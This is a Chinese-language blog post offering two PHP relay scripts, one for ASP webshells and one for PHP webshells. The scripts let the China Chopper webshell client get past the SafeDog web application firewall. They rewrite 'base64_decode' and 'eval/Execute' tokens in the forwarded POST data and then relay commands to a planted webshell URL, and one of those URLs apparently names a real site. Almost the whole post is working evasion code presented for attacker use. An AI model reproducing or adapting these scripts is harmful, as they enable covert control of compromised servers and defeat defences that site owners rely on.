MENU

菜刀轻松过安全狗[asp,php一句话中转脚本]

May 7, 2014 • phpcode

脚本的作者是Sunshie

当菜刀遇到安全狗拦截,该怎么办呢,小伙伴们有时候会和头痛把。有了这两个中转脚本,妈妈再也不要担心菜刀连接出现403等一系列安全狗所造成的问题了。

Asp版的:

<?php 
 
/******************************
fuck SafeDog
如果是asp的一句话那么菜刀连接的时候,地址要这样填:
http://127.0.0.1/bypass.php?type=asp
最后三个字母必须是asp不然菜刀会提示脚本类型选择错误...
*****************************/
$webshell="http://xxoo.com/data/%23data.asp";//把这里改成你的shell地址
$webshell=$webshell."?&1141056911=base64_decode";
$da=$_POST;
$data = $da;
@$data=str_replace("base64_decode",'$_GET[1141056911]',$data); //PHP杀狗
 $data = http_build_query($data);

//asp杀狗
 @$data=str_replace('eval%28%22Ex%22%26cHr%28101%29%26%22cute','eval%28%22Ex%22%26cHr%28101%29%26cHr%2899%29%26%22ute',$data);
echo $data;
$opts = array (
'http' => array (
'method' => 'POST',
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .
"Content-Length: " . strlen($data) . "\r\n",
'content' => $data) 
); 
$context = stream_context_create($opts);
$html = @file_get_contents($webshell, false, $context); //发送post
echo $html;
?>

asp连接的时候要像这样
asp.jpg

PHP版的:

<?php 
$webshell="http://www.phpinfo.me/plus/helen.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode";
 
$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post,并把base64_decode替换成$_GET[1141056911](
 
//print_r($data); 
 
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
 
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post  
echo $html;   
 
?>
Archives QR Code
QR Code for this page
Tipping QR Code